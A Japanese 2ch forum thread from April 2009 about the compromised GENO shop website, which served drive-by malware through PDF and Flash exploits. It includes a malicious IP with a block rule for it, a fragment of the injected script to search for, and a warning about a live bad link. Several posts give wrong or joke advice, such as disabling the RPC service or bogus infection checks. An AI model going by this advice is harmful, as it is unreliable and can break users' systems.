1 :
サトザクラ(dion軍) :
2009/04/07(火) 18:41:19.11 ID:ly823CjS BE:1948750177-PLT(12000) ポイント特典 中古PCとPCパーツの通販ショップGENO URL略
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326- 326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
前スレ
GENOなどのサイトでウイルス感染★7
http://tsushima.2ch.net/test/read.cgi/news/1239070417/ 4/4 AM10時ごろ〜?からサイトにアクセスするだけで感染。
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。
今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
クリーンインストール推奨
・最新版のWindowsUpdateとadobeAcrobatとAdobe Flashであれば感染しない?
・ファイル作成を検出できたアンチウイルスソフトは40のうち10だけ。
・結論、管理もしてないようなPCでアクセスすれば余裕で感染する。
あちこちに短縮URLが貼られているようなので注意
発覚してないだけで他にも感染しているサイトがあるかも
2 :
ねこやなぎ(dion軍) :2009/04/07(火) 18:41:27.19 ID:It123IF+
(1)感染したWebページをひらく ↓ (2)感染したjsが、94.247.2.195の改変jquery.jsを実行 ↓ (3)IP/UAで振り分け処理(Vistaは大丈夫そう?) ↓ (4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開 ↓ (5)bufferOverrunでウィルス本体の起動を試行 感染した場合 パスワードなどの個人情報が抜かれている可能性あり いつものバックドア系ウイルスなんだけど、今回なんか変だな ・PDFファイルとかシステムファイルがなぜか増殖する ・メモリを馬鹿食いする ・再起動時にブルースクリーン とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな 対策 WindowsUpdate PDFリーダーを最新にする (AdobeReader や Foxit Reader) AdobeFlashを最新にする 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 Javascriptを切る スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)
3 :
ツボスミレ(東京都) :2009/04/07(火) 18:41:58.55 ID:KovRB3Kt
GENO終了
まだなってんのかよこれ
ゲノサイト
6 :
クチベニシラン(神奈川県) :2009/04/07(火) 18:43:11.47 ID:Eam8IW3n
さっきアクセスブロックしてくれた Vistaだが感染していたらしょうがないな 最近ブラウザ落ちまくりだが、メモリーは食わないし ブルースクリーンでないからあきらめるわ
7 :
カラスビシャク(東京都) :2009/04/07(火) 18:43:52.67 ID:mpVNKZs1
げの
8 :
イワザクラ(西日本) :2009/04/07(火) 18:44:03.81 ID:Osz0BGWd
524 : シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 02:37:04.72 ID:aXhN0DBC 踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。 IEのテンポラリに残ってた。 jquery[1].js 感染:Trojan-Downloader.JS.Agent.dwf A0G6M8XZ\Vy[1].pdf 感染:Exploit.Win32.Pidief.aog Avast!は最新版でも、このファイルを検出しなかった。 Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。 どなたかの参考になれば幸い。 avast!最強伝説終了
9 :
ハナモモ(宮崎県) :2009/04/07(火) 18:44:18.92 ID:07SNJE2W
現在まで駆除を確認したソフト Norton、AviraAntiVir、Kaspersky
10 :
コスミレ(東京都) :2009/04/07(火) 18:45:01.58 ID:8y99Mpqc
avast!がブロックしたのはまさにマグレだったんだな。 なんだか残念な気持ち。
11 :
キンカチャ(アラバマ州) :2009/04/07(火) 18:47:14.95 ID:LdI5xFux
まだやってんの?
【対策】 WindowsUpdateを行う Adobe Reader/Acrobat/Flash Playerを最新版にする。 火狐+Adblock Plusのやつは */94.247.2.195/* をブロック要素の追加。 検出できるソフト一覧 ●a-squared 4.0.0.101 2009.04.03 Trojan-Spy.Agent!IK ●Avast 4.8.1335.0 2009.04.03 Win32:Daonol-L ●eSafe 7.0.17.0 2009.04.02 Suspicious File ●GData 19 2009.04.03 Win32:KillAV-KS ●Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent ●Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg ●McAfee+Artemis 5573 2009.04.03 Generic!Artemis ●Prevx1 V2 2009.04.03 High Risk Cloaked Malware ●Sophos 4.40.0 2009.04.03 Mal/Generic-A ●TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
各ソフトの対応状況が大事 でも亜種出てるのか・・・ どうしようもないじゃん
14 :
クチベニシラン(神奈川県) :2009/04/07(火) 18:47:44.44 ID:Eam8IW3n
>>9 脳dは駆除できたのか
それでやっとアクセスブロックされたのか
昨日まではスルーだったからな
休日出勤した挙句、会社のPCに感染させた人はどうなったん? 会社を辞めたとかいうレスまで見た
おまえらデフォでjavascriptを有効にしてるなtね恐ろしいことしてるんだな…
つまりPDF開けない環境が勝ち組だったってことでFA?
自分で貼っといて言うのもなんだけど
>>12 って正しいの?
ちなみに前スレからのコピペな
20 :
サトザクラ(catv?) :2009/04/07(火) 18:49:30.04 ID:RZt3WcOH
まだやんのかよ
21 :
コハコベ(熊本県) :2009/04/07(火) 18:49:53.48 ID:K3kufg3G
エロマンガ貼りまくってたキモヲタが会社のPCに感染させてクビになったってマジか? すげーウケルwwくせえZIP厨が減って最高だわ
22 :
ヒュウガミズキ(愛知県) :2009/04/07(火) 18:50:30.14 ID:kRbuAiMq
>>17 javascript有効にしていないとgenoの特価品見れないじゃん
23 :
フモトスミレ(東京都) :2009/04/07(火) 18:51:16.41 ID:V61PjGML BE:166493142-2BP(8000)
>>23 ウイルスを添付されたメールが返ってきそうw
25 :
フモトスミレ(東京都) :2009/04/07(火) 18:52:33.04 ID:V61PjGML BE:499479438-2BP(8000)
26 :
シロウマアサツキ(北海道) :2009/04/07(火) 18:53:25.81 ID:YJoa8phS
ウイルスバスターで駆除できる?
>>19 古くね?PAKとかも入ってるし初心者は混乱するかと
検体別にまとめてほしいね
会社がネット制限かけてない時点で会社の負けだな
29 :
モリシマアカシア(東京都) :2009/04/07(火) 18:54:27.69 ID:fhtlRrYZ
それにしてもgenoってふざけてんな。放置しすぎ
33 :
福寿草(チリ) :2009/04/07(火) 18:55:21.36 ID:VEjMPBUv
これ駄目だね 企業として間違いなく終わった
34 :
ヤエヤマブキ(京都府) :2009/04/07(火) 18:55:36.26 ID:a3TeJlzo
ウィルスセキュリティを愛用する俺に隙はなかった
こりんごって何だよ
36 :
ヒュウガミズキ(愛知県) :2009/04/07(火) 18:56:09.27 ID:kRbuAiMq
genoで買い物しても個人情報抜き取られて色んな請求書が届きそう
37 :
クチベニシラン(神奈川県) :2009/04/07(火) 18:56:14.01 ID:Eam8IW3n
>>19 ノートンでさっき検出した
リスク名はDownloaderだが、
ファイル名がjquery[1].jsだからそうだと思う
39 :
ヤブヘビイチゴ(東京都) :2009/04/07(火) 18:56:45.83 ID:SHWnnIwo
リアルウイルスセキュリティ0 GENO
刑事事件とかになってほしい
41 :
ピンクパンダ(アラバマ州) :2009/04/07(火) 18:57:35.16 ID:ber5aVaa
XGA、IE、ギコナビ、トレンドマイクロ・・・
42 :
タニウズキ(埼玉県) :2009/04/07(火) 18:57:49.03 ID:MZdir2he
ギコナビ使いに悪人はいねぇ
43 :
フモトスミレ(東京都) :2009/04/07(火) 18:58:24.88 ID:V61PjGML BE:1165450087-2BP(8000)
>>38 サンダーバードだと
オプションの開封確認の返答を求める でいいのかな?
これ感染するとどうなるの?
Avast+制限付きサイトでためしに開いたんだが感染してるかな・・・
47 :
キクバクワガタ(栃木県) :2009/04/07(火) 18:59:32.23 ID:O+aoOG65
おもしろそうだからさっさと吊るし上げろ
48 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:00:07.44 ID:Eam8IW3n
>>35 ゆうこりん
+
りんご星(ゆうこりんの星)
=
こりんご
49 :
フモトスミレ(東京都) :2009/04/07(火) 19:00:47.59 ID:V61PjGML BE:728406757-2BP(8000)
送信 ポチ。
【開くな注意!】 tp://qr.quel.jp/form_bsc_url.php ここ開いたらカスペルさんに怒られたんだが・・・
今は感染しないはず…だけどなあ また改竄されてたりしてwwwww
52 :
ナツグミ(東京都) :2009/04/07(火) 19:00:55.25 ID:5lChZxui
これはひどいwww
53 :
サイネリア(鹿児島県) :2009/04/07(火) 19:00:58.14 ID:Gk6VSkbT
ノートン先生がんばったな
下手にバスターの設定いじったせいか、ファイアウォール有効だと ネットに接続できなくなった 無効にしてWindowsのファイアウォールに切り替えたが、大丈夫かね…
55 :
サトザクラ(長屋) :2009/04/07(火) 19:02:00.89 ID:ZyWED150
Vista+Firefoxの俺に隙はなかった
高い重い2ちゃんログを誤検出する為、貧乏なちゃねらーには評判悪い ノートン先生だが、なんだかんだいって頑張るな
なんかパスワードとか抜かれてるのかな 全ての登録パス変更するのめんどくさい・・・
58 :
ヤブヘビイチゴ(東京都) :2009/04/07(火) 19:03:51.41 ID:SHWnnIwo
>>56 Norton使ったことないけど、除外設定とかないのか?
60 :
コバノランタナ(千葉県) :2009/04/07(火) 19:04:30.49 ID:hD4R3NI8
61 :
ラフレシア(東京都) :2009/04/07(火) 19:04:47.41 ID:Yn6ot/oR
何故メンテ中なのかを告知しない最低企業ジェノw
62 :
ナニワズ(catv?) :2009/04/07(火) 19:04:53.19 ID:XAemZmR8
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ(笑)
63 :
ピンクパンダ(アラバマ州) :2009/04/07(火) 19:06:23.01 ID:ber5aVaa
>>56 クレカ強制継続と公式掲示板削除、
USBメモリワームとキンタマ検出できなかったのが原因かと
65 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 19:06:50.06 ID:aSggnVt/
66 :
コバノランタナ(千葉県) :2009/04/07(火) 19:06:54.18 ID:hD4R3NI8
>>59 あるよ。
手動になるけど、専用ブラウザのログ保存先のフォルダを検出除外すれば大丈夫。
67 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:07:42.16 ID:Eam8IW3n
>>51 おれはGENOは行っていないので他のサイトで感染(感染未遂かもしれない)
パケットキャプチャしていないが状況から判断して
アフィリエイトが貼ってあるサイトで起きてるらしい
ここ2週間の状況
Vista
IE7 固まることあり(原因は違うかもしれない)
火狐 落ちることあり
メモリー 問題なし
再起動 ブルースクリーンなし
システムフォルダ 改ざんなし
68 :
セキチク(関西地方) :2009/04/07(火) 19:07:45.50 ID:A+H9NpvZ
こんな状況でも今日商品のページが更新されてるんだけど。 それってどうよ?
69 :
ボロニア・ピンナタ(岡山県) :2009/04/07(火) 19:07:50.53 ID:DYCwWaKV
グーグルで検索かけると検索結果出てくる前に固まるんだけど このウイルス関係してんの?
70 :
ヤエヤマブキ(京都府) :2009/04/07(火) 19:08:20.47 ID:a3TeJlzo
71 :
イヌガラシ(千葉県) :2009/04/07(火) 19:08:21.03 ID:AltxXzhm
74 :
コバノランタナ(千葉県) :2009/04/07(火) 19:09:42.46 ID:hD4R3NI8
>>68 クーロンみたいなので数日分纏めて事前に登録されてて
時間になったり掲示してたのが売り切れたら差し変わる様に
自動更新されたりするんじゃないのかな。
76 :
ジュウニヒトエ(愛知県) :2009/04/07(火) 19:10:13.01 ID:GdriP0k3
新品のCore2パソ届いた!!!!!! ちゃんと新品でNECの保証書もあるし助かった。 このまま騒ぎが大きくなったらと思うとガクブルだった。
77 :
マンサク(長屋) :2009/04/07(火) 19:10:22.53 ID:ygvm3E2F
新しい更新来たけどAVGは未だ駆除出来ないの?
>>58 おぉサンキュ!このサイト前に無くなったと思って行ってなかったが復活してたんだな
>>62 カスペルさん切ってもオールグレイトー!・・・・・
79 :
ヤグルマギク(dion軍) :2009/04/07(火) 19:11:53.74 ID:Fm5QmveS BE:1429210548-2BP(0)
80 :
メギ(東京都) :2009/04/07(火) 19:12:32.24 ID:PKjbI4ev
>>78 aguseは判定ボタンが無くなったのが残念だな。
>>67 不安だったらアフィサイトで使ってるjavascriptファイル全部抜いて
document.write(unescape('%3C4x4sWXkcr4
で検索してみろ
ヒットしたらそのサイトはGENO2号だ!
83 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:13:38.16 ID:Eam8IW3n
>>73 ウイルス検出の9割が2chログ
愛知とかコード貼っているやつのがほとんどだろうが
84 :
クロッカス(コネチカット州) :2009/04/07(火) 19:14:04.83 ID:QuwbP3Q6
カスペは感知したか?
アンチウイルスソフトはほとんど関係ないだろこれ。 とっくの昔にセキュリティパッチが提供されてた既知の脆弱性を、 アップデートせずに放置してるっつーのがありえない。 きちんとソフトをアップデートするのが最初のステップで、 それすっ飛ばしてアンチウイルスソフトを導入するだけじゃ意味ないよ。
>>82 unescapeする文字列入れちゃダメだろ。サイトごとに違うんだから。
87 :
オーブリ・エチア(埼玉県) :2009/04/07(火) 19:17:01.79 ID:of3VDs6s
一番いいアンチウィルスソフトって何?フリーのみで宜しく
>>62 SANNET
GREAT
GREAT
GREAT
GREAT
89 :
フデリンドウ(東京都) :2009/04/07(火) 19:17:43.39 ID:UPpZUNuf
まだ感染するのか? ここまで放置してたらGENOが訴えられても仕方ないね
90 :
シキミ(関東・甲信越) :2009/04/07(火) 19:17:45.62 ID:aU/3F4h3
>>62 GREAT
GREAT
POOR \(^o^)/
GREAT
93 :
フモトスミレ(東京都) :2009/04/07(火) 19:20:06.79 ID:V61PjGML BE:332985582-2BP(8000)
たぶんだけど、GENOの中の人メールとか見てないっていうか
メールサーバーごと、鯖管理会社に渡してるんじゃね?
94 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:20:19.19 ID:Eam8IW3n
>>82 2号を見つけようとしているが、アフィがランダム表示みたいでわからん
時間帯かもしれないし、さっき削除は13時だが起床したばかりだからノートンのアップデートで検出したのかもしれない
IEが固まるのは、Yahooかニコニコのどっちか
火狐が落ちたのは、18禁サイト
95 :
ヤグルマギク(dion軍) :2009/04/07(火) 19:21:06.63 ID:Fm5QmveS BE:446628825-2BP(0)
ん?何かあちこちで短縮とスレが立ってるのは気のせい?
96 :
ハナモモ(宮崎県) :2009/04/07(火) 19:22:20.13 ID:07SNJE2W
97 :
コスミレ(コネチカット州) :2009/04/07(火) 19:22:48.70 ID:PPZZp/ng
やべ感染した
98 :
スズナ(愛知県) :2009/04/07(火) 19:22:50.19 ID:A1BTkc4W
geno最高や!上海問屋なんて最初からいらんかったんや!
99 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:24:01.80 ID:Eam8IW3n
100 :
センダイハギ(山形県) :2009/04/07(火) 19:26:01.56 ID:PQLH9/lU
adobeのソフト全sakuで対策余裕でした
>>15 Process Explorerで何が見つかるとやばいの?
103 :
カンガルーポー(福島県) :2009/04/07(火) 19:27:58.94 ID:jvNoFLXo
つーかバッファオーバーフローの脆弱性ってかなりヤバいんじゃないの? XPなんて管理者権限で使ってる人多そうだし、感染してたら何されるかわかったもんじゃないでしょ。 今回のマルウェアが具体的に何やるのかわかってない以上、フォーマットして再インストールするしかなくない? 駆除とかで済むもんなのかな?
105 :
エニシダ(catv?) :2009/04/07(火) 19:29:32.39 ID:9LvM9cEU BE:1707024285-2BP(6280)
とりあえず file://localhost/C:/ これをブラウザのアドレスバーにコピペしてCドライブの内容が見えたら 再インストールも視野に入れたほうがいい
>>102 いや、今回の騒動はadobeが悪いだろ。
>>105 見えたーウイルスに感染したー(棒読み)
108 :
クチベニシラン(神奈川県) :2009/04/07(火) 19:33:12.77 ID:Eam8IW3n
>>107 あとは
コマンドプロンプトて
netstat
と入力して
bananaとかtigerとかいうサーバーが見れたらアウトだな
109 :
ラフレシア(東京都) :2009/04/07(火) 19:33:26.81 ID:Yn6ot/oR
なんとかして他のせいにしようとしてるGENO社員必死だな(棒
PC初心者だと どこまで信用するんだろうか
>>99 それっぽいね、発信源ソースは。
GENOは被害者かもしれないけど改ざんされてから放置期間が長すぎる。 これって被害を拡大させた一員だし、商売やっている以上速やかに対策する義務があるんじゃないの? なんか、過失って事で損害賠償とか責任とかあるような気がする。 あと、なんらまともなアナウンスなし。もうすこしまともな対応してほしい。 コンプライアンスや非常時の対策まったく駄目だと思う。
>>101 HijackThis で観れば
実行中のprocessesや、BHO、レジストリのHKLM\..\Run、Serviceなんかも分かるよ
GENOはまだウイルス垂れ流してんのか? だとしたら救いようのない糞企業だな
115 :
バイカカラマツ(新潟県) :2009/04/07(火) 19:39:40.91 ID:qzE/upBW
ウイルス感染してから長期間放置 メンテ後の報告は、小さな画像ファイルで サーバーに一部不都合があった、スイマセンwwwwww、のみ(実は直ってない) 指摘され再びメンテするも、TOPページのみ変更してサーバーは稼動中 むろん商品閲覧可能、感染も可能 G E N O は ネ申
もちろん改ざんする奴が一番悪いんだろうが GENOの対応の最低っぷりにもあきれるな ネット使って商売する資格ないだろ
117 :
キュウリグサ(兵庫県) :2009/04/07(火) 19:42:42.33 ID:+a5MlpUw
118 :
シナミズキ(catv?) :2009/04/07(火) 19:42:57.56 ID:fxF2WuuW
なんだまだなんも動きないのか
119 :
サポナリア(愛知県) :2009/04/07(火) 19:44:32.98 ID:i6gnM1Fe
GENOは土曜の時点か遅くとも日曜にサーバー閉じてれば 被害者で済んだだろうけど 散々指摘されてるのに 対策も取らずに該当するファイルだけ削除して サーバー開けちゃってる時点で被害者から共犯者に変わってしまってる しかも、 ウイルスに対するアナウンスも無し この時点で共犯者から加害者に変わってるかもしれん
120 :
ヤブツバキ(埼玉県) :2009/04/07(火) 19:45:11.04 ID:bwHPl4CZ
genoの500円mp3プレイヤー欲しかったのに しばらくHPアクセス出来んな
121 :
ラフレシア(東京都) :2009/04/07(火) 19:45:43.97 ID:Yn6ot/oR
安物買いの銭失いワロスw
123 :
カンパニュラ・サキシフラガ(大阪府) :2009/04/07(火) 19:47:06.65 ID:xLJJRuyw
煙のないところに火はたたないっていうだろ。 GENOに恨みある連中の仕業としか。 まぁやられて当然な事してんじゃない?
124 :
シナミズキ(catv?) :2009/04/07(火) 19:47:11.72 ID:fxF2WuuW
PC通販ショップ「GENO」のサイトが改ざんされ、サイトを閲覧した場合にウイルス感染の危険がある状態になっていたという情報が、
ネット上の掲示板などで話題になっているほか、弊誌にもメールで情報が寄せられている。
現在、「GENO」のサイトは「臨時サーバーメンテナンス中」という形で通販業務を停止している。
ネット上で話題になっている内容などを総合すると、4月4日ごろにGENOのサイトが改ざんされ、Flash PlayerやAdobe Readerの脆弱性を悪用して、
ユーザーPCにウイルスを感染させようとする状態になっていたと見られる。
GENOに確認したところ、「サイトにアクセスした際に、勝手に海外のサイトに接続される」といった問い合わせが多数寄せられたため、
7日に「サーバーメンテナンス中」という形で通販サービスを停止。現在システム会社にサーバーの検査を依頼しているが、検査結果が帰ってきていないため、
ページの改ざんやウイルス感染の危険性などについては、現時点では確認できていないという。GENOでは、検査が完了次第、詳細を報告したいとしている。
http://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html
>>120 尼で売られてる2100円のZENStoneが良いと思うが
面倒だからバックアップとって寝かせてたHDDにwindowsインスコした 全体の動作が無茶苦茶軽快になった
131 :
アグロステンマ(アラバマ州) :2009/04/07(火) 19:50:44.45 ID:S5HJdfJq
数日前に朝日新聞が1面使って広告を掲載していたな もしかしたらグルだったのか?
つかまだどんなウイルスかわかってないのかよ
>>130 しないしないw
ただ何処で買うかによっては知らんけど
価格com見るだけなら無問題
俺も愛用してる 4980円で買ったけど・・・
音は文句無い
135 :
シュロ(東京都) :2009/04/07(火) 19:53:12.62 ID:pYCHksmJ
結局楽天とかはセーフだったの?
結局感染確認方法はなんなのかな。 cmd使ってない、またはcmdを使うプログラムが ないのにconime.exeが活動してたらアウト?
>>133 outpostって更新が終ってたような・・・・
140 :
プリムラ・フロンドーサ(東京都) :2009/04/07(火) 19:55:48.83 ID:jHEwM161
閉店セールまだかよ
FWって性能いいとされてるようなのは大抵細かい設定が必要だろ 素直にZAだの総合セキュリティソフトのFW入れとけって
>>134 見てきた。
あまり評判よろしくないのね。
情報dd
>>133 よくわからないならおとなしく製品買ったほうがいい
わけもわからず設定したら結局ザルになるよ
>>136 簡易検査ソフトうpされてたなそういえば
>>120 メーカーのサイト見たらドンキとかで購入した人は保証ないみたいだね
GENOで買っても同じ目にあうんじゃないかな
今どーなってんの?
147 :
サポナリア(愛知県) :2009/04/07(火) 19:58:43.72 ID:i6gnM1Fe
GENOを利用したこと無かったが ココまでイイカゲンだと通販でトラブル起きても 「トラブルなんて知らないよ♪」 で済まされそうだなwww
>>133 PC Tools使え英語でもいいならCOMODO
今踏んじゃった サーバメンテ中だったんだが感染してるのか? 取り合えずオンラインスキャンしてみたが反応無し で、何がどうなるウイルスなんだ?
150 :
ギシギシ :2009/04/07(火) 19:59:17.31 ID:7sGOFaIT
>>138 以前価格コムが同じように改ざんされた時はNHKのニュース7でも報道されたしな
>>133 前に雑誌かなんかでzonealarm薦めてたな
使ってないから知らんが
>>138 そういやいつだったか価格.comもそんな騒動あったな
153 :
コバノランタナ(千葉県) :2009/04/07(火) 20:00:25.31 ID:hD4R3NI8
>>145 いくらなんでもたかだか500円の品にメーカー保証を求めても不毛だろw
それこそ北京語や広東語が堪能な奴以外には無意味な保証だと思うぞw
154 :
サトザクラ(dion軍) :2009/04/07(火) 20:00:28.69 ID:ly823CjS
クレカ使えないようなサイトは信用できない
システム要件 カスペルスキーオンラインスキャナ 7.0 が正常に稼働するためには コンピュータが次の要件を満たす必要があります: 30 MB 以上のディスク空き容量 Microsoft Windows 2000 Professional SP4、 Microsoft Windows XP SP2 32ビット/64ビット、 Microsoft Windows Vista 32ビット/64ビット: Microsoft Internet Explorer 6か7、Opera 9、あるいはFirefox 2 Ubuntu 7.10: Firefox 2 Sun Java SE Runtime Environment (JRE): Microsoft Windows Vista、バージョン1.6.0以上; その他のOS、バージョン1.5.0以上 JavaおよびJavaScriptがウェブブラウザで使用できること カスペルスキーオンラインスキャナは、XP SP3では、使用できないことでFA?
>>149 ラトビアと通信するらしいんだが、実はまだよく解ってない
158 :
フモトスミレ(東京都) :2009/04/07(火) 20:02:08.12 ID:V61PjGML BE:437043773-2BP(8000)
>>139 どうやらカスペでスキャンできるみたいだね、やってみる。
>>155 今、まさにスキャンしてる最中だけど、今のところ問題ないよ
162 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 20:03:29.10 ID:aSggnVt/
COMODO はちゃんと設定しないとザルになるからネッツ初心者はやめとけ PC Toolsで十分
これからはこんな事態が起きてもすぐに対処出来るように、 regseekerを入れて使い方を一通りマスターしておくべきだな。
164 :
セイヨウオダマキ(アラバマ州) :2009/04/07(火) 20:05:01.22 ID:bgguM/06
ZONE Alarmは初心者でも扱えるのに性能いい。 ただしProだけかもしれない。
百歩譲って改竄されたのは被害者で仕方ないとしても、その後の無責任 極まる対応の積み重ねは弁解の余地もないな
>>164 良くねーよ
proでやっと並の上程度だろ
167 :
ナズナ(宮城県) :2009/04/07(火) 20:05:51.09 ID:ulC9EMJP
AdobeにむかついたのでPhotoshopCS4Extendedの割れをインスコした
GENO終了のお知らせ 新品→上海問屋 中古ジャンク→電脳売王
outpost1.0を使っている俺のセキュはザルなんだろうなー 更新あるのがいいよねやっぱ
170 :
コバノランタナ(千葉県) :2009/04/07(火) 20:07:07.25 ID:hD4R3NI8
>>162 うんうん。
無知なお馬鹿さんが背伸びして無駄に高機能なファイアーウォールを導入した所で
まともに設定して使いこなせなければ、geno状態になるからねw
猿でも使えるWindowsFirewallとWindowsDefenderを普通に使った方がマシってレベル。
>>168 売王は発送対応が糞だからw
オレの場合はこうだが
新品→NTT-X
雑貨→DealExtreme
中古→祖父
そういや価格コムの騒ぎでNOD32の名前を知ったな
>>155 ,161
自分のPCは、
「カスペ7.0を正常に動作するためのシステム要件を満たしていません。」
という表示が出て、
その上の概要の
OSの種別
Windows XPという文字が赤字なので
XP SP3だとスキャンできないのかと思っていたのですが
どうしたいいのでしょうか?
IE6、JAVA1.6、x86です。
174 :
クロッカス(コネチカット州) :2009/04/07(火) 20:14:26.23 ID:rMLeuv3x
もう不安で堪らないし疲れたからOS再インストール中。 短縮URLをNGに追加してたら踏んじまった、情けねぇ
176 :
ボロニア・ピンナタ(岡山県) :2009/04/07(火) 20:17:09.17 ID:DYCwWaKV
702 名前:ひよこ名無しさん[sage] 投稿日:2009/04/07(火) 20:11:04 ID:??? 簡易感染チェック Ctrl+Alt+Deleteでタスクマネージャ出して、プロセスのとこで 「イメージ名」でソートして、svchost.exeのユーザー名を確認。 んでNETWORK SERVICEってなってるとこが2つあると感染の危険性大。 さらにSystem Idle ProcessのCPUが90以上だと完全アウトだね。
178 :
ペチュニア(長屋) :2009/04/07(火) 20:18:53.60 ID:PkmMlTGo
179 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 20:19:32.04 ID:aSggnVt/
>>171 NTT-X は液晶モニタ安いよね、送料も無料が殆ど
電脳売王 は小物は運賃高くつくけどね、今PenMノートが安いよ
上海問屋 はコネクタが光るケーブルやHDDケースが安かった
CASIOのG-Shockが安いけど、国内保証つかないんじゃないかな
「大変です! サイトが改ざんされて個人情報が盗まれた可能性があります」 「利用者からのクレームに対応しきれません」 「新聞社から取材依頼がきてます」 「サイバークロスカウンターで対応しろ!」 「了解です。監視という名目で改ざんは放置します」←今ココ 「よし! ダブルクロスカウンターもやれ!」 「漏洩した情報は個人情報に該当しないと言い張ります」 「適切な対策を施していたので当社に過失はないと言い張ります」 「トリプルクロスカウンターだ!」 「被害者への補償は一切しないと堂々と発表します」 「ポリシーのないセキュリティ業界有名人に調査依頼をかけます」
183 :
ベゴニア・センパフローレンス(静岡県) :2009/04/07(火) 20:21:47.13 ID:yv5EBBKu
最近ブラウザが糞重くて落ちるんだけどもしかしてウイルスなのか? ちょうど初スレが立ち始めた頃から症状が出始めたんだが
>>176 釣りにしてももうちょっとまともに作れよ
System Idleが常時90未満ってそっちの方が色々とまずいだろ
>14時50分頃、ネットでしかいきがれないカス(通称2ちゃんねらー)が電話したが、GENOは電話にでないという。 余計なお世話だ、アンサイクロ野郎www
そろそろマスゴミも取り上げても良さそうな気がするが 実際に何が起こるのか分かってないとなんともしょうがないな
>>183 そんなの誰にもわからないからスキャンしようね
188 :
ヒメオドリコソウ(コネチカット州) :2009/04/07(火) 20:25:15.18 ID:PPZZp/ng
このウイルスを使うことで誰が得してんの?ウイルス開発者?
189 :
クレマチス(コネチカット州) :2009/04/07(火) 20:25:45.03 ID:2Do9fAdF
土日に親切なねらーが実店舗で告げたそうだよ 帰ってきた言葉はお決まりの「ネットショップのことは分かりません」だってさ
>>157 ,175
Cドライブの空き容量が1.8GでOKだと思うのですが、
どうなんでしょう?
JaneでGENOのリンクをブラクラ登録しただけなので
たぶん大丈夫じゃないかなと思っているのですが。
>>188 たとえばゾンビPCにしちまえばゾンビPCマーケットで売れる
個人情報はどうだろうな
メールアドレスはスパム用においしいのかもな
クレジットカード番号はあったらおいしいけどどうかなあ
>>173 流石にそれはカスペに聞いてくれとしか言えないんだが……
とりあえず、こっちの環境を書いておくと、
IE8、Java1.6.0_13-b03、x86 WinXP Pro SP3
しかし、完全スキャンは結構な時間かかるなぁ。
原因ではないだろうが確かに少なすぎだな さすがにそこまでいくと、速度低下起こすぞ
>>190 1.8GBって結構少ないけど30MB以上ってなってるから大丈夫そうだね
あとはOSが最新じゃないとかJREが古いとかかなあ
それぞれ最新に更新してから試してみればいいんじゃね
あとブラウザキャッシュクリアも試してみてね
196 :
サポナリア(愛知県) :2009/04/07(火) 20:30:45.72 ID:i6gnM1Fe
ハッカー大会が有るようだから その関係だろうな ハッカー大会自体は真面目な内容らしいが 毎回、その前後にウイルス被害が拡大してるようだし
Cドライブは少なくとも全容量の半分以上空き作っておかなきゃ 一番神経質になるドライブなのに
198 :
セキチク(関西地方) :2009/04/07(火) 20:32:05.91 ID:A+H9NpvZ
ここ三日間、avastでもカスぺオンラインでもバスターオンラインでも検出されなかったがもう 感染してないってことでいいよな… もう疲れたよ…
201 :
モッコウバラ(長屋) :2009/04/07(火) 20:35:38.82 ID:QdzM1ljl
202 :
ホトケノザ(dion軍) :2009/04/07(火) 20:37:50.24 ID:5XUI3fZx
斧のURL踏んだはずなのに違うサイトに飛んだからすぐ閉じたんだけど これだけでもう感染してるの?
203 :
クリサンセコム・ムルチコレ(アラバマ州) :2009/04/07(火) 20:38:51.27 ID:aSggnVt/
>>198 つ 一本道のHD高画質がオススメ(4000kbps)
